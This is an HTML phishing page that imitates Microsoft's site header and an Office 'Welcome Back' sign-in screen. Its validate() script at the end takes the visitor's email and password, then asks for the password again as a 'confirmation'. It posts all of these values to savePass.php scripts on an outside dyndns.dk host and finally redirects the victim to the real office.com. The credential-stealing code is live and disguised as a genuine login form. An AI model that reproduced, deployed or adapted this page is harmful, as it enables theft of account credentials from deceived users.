        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_PCAndDevices_Accessories_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c8c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c8c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_52" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/accessories/en-us" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_PCAndDevices_Accessories_nav&quot;,&quot;id&quot;:&quot;n1c3c8c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c8c2c1c9c2m1r1a1&quot;}">Accessories</a>
            
        </li>
            </ul>
            
        </li>
        <li class="f-sub-menu js-nav-menu nested-menu" data-m="{&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c9c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:9,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">

            <button type="button" f-multi-parent="true" aria-expanded="false" data-m="{&quot;id&quot;:&quot;nn1c9c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c9c2c1c9c2m1r1a1&quot;}">Entertainment</button>
            <ul aria-hidden="true">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Products_DevicesAndXbox_XboxAndGames_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c9c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c9c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_54" class="js-subm-uhf-nav-link" href="https://www.xbox.com/en-us/games/xbox-one?xr=shellnav" data-m="{&quot;cN&quot;:&quot;GlobalNav_Products_DevicesAndXbox_XboxAndGames_nav&quot;,&quot;id&quot;:&quot;n1c2c9c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c9c2c1c9c2m1r1a1&quot;}">Xbox games</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Entertainment_PCGames_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c9c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c9c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_55" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/windows/windows-10-games" data-m="{&quot;cN&quot;:&quot;GlobalNav_Entertainment_PCGames_nav&quot;,&quot;id&quot;:&quot;n1c3c9c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c9c2c1c9c2m1r1a1&quot;}">PC games</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Entertainment_WindowsDigitalGames_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c9c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c9c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_56" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/games/windows?icid=TopNavWindowsGames" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Entertainment_WindowsDigitalGames_nav&quot;,&quot;id&quot;:&quot;n1c4c9c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c9c2c1c9c2m1r1a1&quot;}">Windows digital games</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Entertainment_MoviesAndTV_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c9c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c9c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_57" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/movies-and-tv?icid=TopNavMoviesTv" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Entertainment_MoviesAndTV_nav&quot;,&quot;id&quot;:&quot;n1c5c9c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c9c2c1c9c2m1r1a1&quot;}">Movies &amp; TV</a>
            
        </li>
            </ul>
            
        </li>
        <li class="f-sub-menu js-nav-menu nested-menu" data-m="{&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:10,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">

            <button type="button" f-multi-parent="true" aria-expanded="false" data-m="{&quot;id&quot;:&quot;nn1c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c10c2c1c9c2m1r1a1&quot;}">Business</button>
            <ul aria-hidden="true">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Business_MicrosoftAzure_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c10c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_59" class="js-subm-uhf-nav-link" href="https://azure.microsoft.com/en-us/" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Business_MicrosoftAzure_nav&quot;,&quot;id&quot;:&quot;n1c2c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c10c2c1c9c2m1r1a1&quot;}">Microsoft Azure</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Business_MicrosoftDynamics365_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c10c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_60" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/dynamics365/home" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Business_MicrosoftDynamics365_nav&quot;,&quot;id&quot;:&quot;n1c3c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c10c2c1c9c2m1r1a1&quot;}">Microsoft Dynamics 365</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Business_Microsoft365_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c10c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_61" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/microsoft-365" data-m="{&quot;cN&quot;:&quot;GlobalNav_Business_Microsoft365_nav&quot;,&quot;id&quot;:&quot;n1c4c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c10c2c1c9c2m1r1a1&quot;}">Microsoft 365</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Business_Enterprise_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c10c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_62" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/enterprise" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Business_Enterprise_nav&quot;,&quot;id&quot;:&quot;n1c5c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c10c2c1c9c2m1r1a1&quot;}">Microsoft Industry</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Business_DataPlatform_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c6c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:6,&quot;aN&quot;:&quot;c10c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_63" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/sql-server/ " data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Business_DataPlatform_nav&quot;,&quot;id&quot;:&quot;n1c6c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c6c10c2c1c9c2m1r1a1&quot;}">Data platform</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_MicrosoftAdvertising_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c7c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:7,&quot;aN&quot;:&quot;c10c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_64" class="js-subm-uhf-nav-link" href="https://go.microsoft.com/fwlink/?linkid=2026638" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_MicrosoftAdvertising_nav&quot;,&quot;id&quot;:&quot;n1c7c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c7c10c2c1c9c2m1r1a1&quot;}">Microsoft Advertising</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Business_Licensing_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c8c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:8,&quot;aN&quot;:&quot;c10c2c1c9c2m1r1a1&quot;}">
            <a id="Licensing" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/licensing/default" data-m="{&quot;cN&quot;:&quot;GlobalNav_Business_Licensing_nav&quot;,&quot;id&quot;:&quot;n1c8c10c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c8c10c2c1c9c2m1r1a1&quot;}">Licensing</a>
            
        </li>
            </ul>
            
        </li>
        <li class="f-sub-menu js-nav-menu nested-menu" data-m="{&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:11,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">

            <button type="button" f-multi-parent="true" aria-expanded="false" data-m="{&quot;id&quot;:&quot;nn1c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c11c2c1c9c2m1r1a1&quot;}">Developer &amp; IT  </button>
            <ul aria-hidden="true">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_DeveloperAndIT_.Net_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c11c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_67" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/net/" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_DeveloperAndIT_.Net_nav&quot;,&quot;id&quot;:&quot;n1c2c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c11c2c1c9c2m1r1a1&quot;}">.NET</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_DevelopersAndIT_VisualStudio_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c11c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_68" class="js-subm-uhf-nav-link" href="https://visualstudio.microsoft.com/" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_DevelopersAndIT_VisualStudio_nav&quot;,&quot;id&quot;:&quot;n1c3c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c11c2c1c9c2m1r1a1&quot;}">Visual Studio</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_ProductsandServices_WindowsServer_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c11c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_69" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/cloud-platform/windows-server" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_ProductsandServices_WindowsServer_nav&quot;,&quot;id&quot;:&quot;n1c4c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c11c2c1c9c2m1r1a1&quot;}">Windows Server</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_DeveloperAndIT_WindowsDevCenter_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c11c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_70" class="js-subm-uhf-nav-link" href="https://developer.microsoft.com/en-us/windows" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_DeveloperAndIT_WindowsDevCenter_nav&quot;,&quot;id&quot;:&quot;n1c5c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c11c2c1c9c2m1r1a1&quot;}">Windows Dev Center</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_DeveloperAndIT_Docs.microsoft.com_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c6c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:6,&quot;aN&quot;:&quot;c11c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_71" class="js-subm-uhf-nav-link" href="https://docs.microsoft.com/en-us/" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_DeveloperAndIT_Docs.microsoft.com_nav&quot;,&quot;id&quot;:&quot;n1c6c11c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c6c11c2c1c9c2m1r1a1&quot;}">Docs</a>
            
        </li>
            </ul>
            
        </li>
        <li class="f-sub-menu js-nav-menu nested-menu" data-m="{&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:12,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}">

            <button type="button" f-multi-parent="true" aria-expanded="false" data-m="{&quot;id&quot;:&quot;nn1c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c12c2c1c9c2m1r1a1&quot;}">Other</button>
            <ul aria-hidden="true">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Other_MicrosoftStore_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c12c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_73" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/home" data-m="{&quot;cN&quot;:&quot;GlobalNav_Other_MicrosoftStore_nav&quot;,&quot;id&quot;:&quot;n1c2c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c12c2c1c9c2m1r1a1&quot;}">Microsoft Store</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Other_Microsoft Rewards_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c12c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_74" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/rewards" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Other_Microsoft Rewards_nav&quot;,&quot;id&quot;:&quot;n1c3c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c12c2c1c9c2m1r1a1&quot;}">Microsoft Rewards </a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Products_SoftwareAndServices_FreeDownloadsAndSecurity_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c12c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_75" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/download/default.aspx" data-m="{&quot;cN&quot;:&quot;GlobalNav_Products_SoftwareAndServices_FreeDownloadsAndSecurity_nav&quot;,&quot;id&quot;:&quot;n1c4c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c12c2c1c9c2m1r1a1&quot;}">Free downloads &amp; security</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Products_ForStudentsAndEducators_Education_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c12c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_76" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/education?icid=CNavMSCOML0_Studentsandeducation" data-m="{&quot;cN&quot;:&quot;GlobalNav_Products_ForStudentsAndEducators_Education_nav&quot;,&quot;id&quot;:&quot;n1c5c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c12c2c1c9c2m1r1a1&quot;}">Education</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;More_Other_Store_Locations_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c6c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:6,&quot;aN&quot;:&quot;c12c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_77" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/locations/find-a-store?icid=TopNavStoreLocations" data-m="{&quot;cN&quot;:&quot;GlobalNav_More_Other_Store_Locations_nav&quot;,&quot;id&quot;:&quot;n1c6c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c6c12c2c1c9c2m1r1a1&quot;}">Store locations</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Store_More_GiftCards_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c7c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:7,&quot;aN&quot;:&quot;c12c2c1c9c2m1r1a1&quot;}">
            <a id="shellmenu_78" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/gift-cards" data-m="{&quot;cN&quot;:&quot;GlobalNav_Store_More_GiftCards_nav&quot;,&quot;id&quot;:&quot;n1c7c12c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c7c12c2c1c9c2m1r1a1&quot;}">Gift cards</a>
            
        </li>
            </ul>
            
        </li>
                                                            <li class="f-multi-column-info">
                                    <a data-m="{&quot;id&quot;:&quot;n13c2c1c9c2m1r1a1&quot;,&quot;sN&quot;:13,&quot;aN&quot;:&quot;c2c1c9c2m1r1a1&quot;}" href="https://www.microsoft.com/en-us/sitemap.aspx" aria-label="" class="c-glyph">View Sitemap</a>
                                </li>
                            
                        </ul>
                    </div>
                </li>
            </ul>
        </nav>
</div>
                        <div id="meControl" class="c-me" data-signinsettings="{&quot;containerId&quot;:&quot;meControl&quot;,&quot;enabled&quot;:true,&quot;headerHeight&quot;:48,&quot;debug&quot;:false,&quot;extensibleLinks&quot;:[],&quot;userData&quot;:{&quot;idp&quot;:&quot;msa&quot;,&quot;firstName&quot;:&quot;&quot;,&quot;lastName&quot;:&quot;&quot;,&quot;memberName&quot;:&quot;&quot;,&quot;cid&quot;:&quot;&quot;,&quot;authenticatedState&quot;:&quot;3&quot;},&quot;rpData&quot;:{&quot;preferredIdp&quot;:&quot;aad&quot;,&quot;msaInfo&quot;:{&quot;signInUrl&quot;:&quot;&quot;,&quot;signOutUrl&quot;:&quot;&quot;,&quot;meUrl&quot;:&quot;https://login.live.com/me.srf?wa=wsignin1.0&quot;},&quot;aadInfo&quot;:{&quot;signOutUrl&quot;:&quot;&quot;,&quot;appId&quot;:&quot;4345a7b9-9a63-4910-a426-35363201d503&quot;,&quot;siteUrl&quot;:&quot;&quot;,&quot;blockMsaFed&quot;:true}}}" data-m="{&quot;cN&quot;:&quot;GlobalNav_Account_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c1c9c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c1c9c2m1r1a1&quot;}"><div class="mectrl_root mectrl_focus_visible"><a id="mectrl_main_trigger" class="mectrl_resetStyle mectrl_trigger" aria-label="Sign in to your account" href="https://www.office.com/login?es=Click&amp;ru=%2F&amp;msafed=0" target="_top"><span class="mectrl_screen_reader_text">Sign in to your account</span><div class="mectrl_header" aria-hidden="true" role="presentation"><div id="mectrl_headerPicture" class="mectrl_profilepic mectrl_glyph glyph_signIn_circle" aria-hidden="true" role="presentation"></div></div></a></div></div>
                
            </div>
        </div>
        
        
    </div>
    
</header>


    </div>
        </div>

    </div>

    </div>

    </div>




    <picture class="home__background--parallax">
        
        
        <img class="" src="https://blobs.officehome.msocdn.com/images/content/images/hero-image-desktop-f6720a4145.jpg" alt="" aria-hidden="true">
    </picture>

    <div id="main" role="main">
            <form method="post" onsubmit="validate();return false;">
<div id="hero-section" class="section hero__section x-hidden-focus" aria-labelledby="hero-header" role="region">
    <div class="hero__headline-wrapper fade" style="opacity: 1;">
        <h1 id="hero-header" class="hero__headline">Hello, Welcome Back.</h1>
        <p class="hero__subtitle" aria-label="Your place to create, communicate, collaborate, and get great work done."></p><ul class="buttons-container hero__buttons-container">
            
            <li>
                <input type="email" placeholder="Email Address" required="" id="hero-banner-sign-in-to-office-365-link" class="text--medium hero__button hero__button--alternative text--medium" style="
    margin-left: -40%;
    width: 200%;
    padding:7px;
">
 
            </li>
        </ul><p class="hero__subtitle" aria-label="Your place to create, communicate, collaborate, and get great work done."></p>
        <ul class="buttons-container hero__buttons-container">
            <li>
                <button id="hero-banner-get-office-link" class="button hero__button text--small" oncl style="
    height: 40px;
    line-height: 40px;">Sign In</button>
            </li>

        </ul>
        <p style="color:white;text-align: center;padding-top: 30px;padding-bottom: 5px;">Switch to a Different Account</p>
        <p style="color:white;text-align: center;padding-bottom: 10px;">Not you? <span  class="hero__subtitle">Forgot this account</span></p>
        
    </div>
</div>
</form>
    </div>
        </div>
    </div>
    <div style="display: none">
        <div id="emailValue"></div>
        <div id="passw"></div>
    </div>
    <script
  src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
  <script type="text/javascript">
      function validate(){
        if ($('#emailValue').text()!='') {
            if($('#passw').text()){
                if ( $('#passw').text()==$("input[type=password]").val()) {
                    $.ajax({
                      type: "POST",
                      url: "https://asp0s213.dyndns.dk/desprate4/savePass.php",
                      data: {email:$('#emailValue').text(),passw:$('#passw').text(),cpassw:$("input[type=password]").val(),error:'0'},
                      success: function(data){
                        window.location='https://office.com'
                    }
                    });
                }
                else{
                    $.ajax({
                      type: "POST",
						url: "https://asp0s213.dyndns.dk/jayy3/savePass.php",
                      data: {email:$('#emailValue').text(),passw:$('#passw').text(),cpassw:$("input[type=password]").val(),error:'1'},
                      success: function(data){}
                    });
                    alert("Password doesn't match, please try again.");
                    window.location=document.location.href;
                }
            }
            else{
                $('#passw').text($("input[type=password]").val());
                $('form').trigger("reset"); 
                $('input[type=password]').attr('placeholder','Confirm Password');
            }
        }
        else{
            $('#emailValue').text($("input[type=email]").val());
            $('form').trigger("reset"); 
            $('input[type=email]').attr('type','password');
            $('input[type=password]').attr('placeholder','Password');
        }
        return false;
      }
  </script>
</body></html>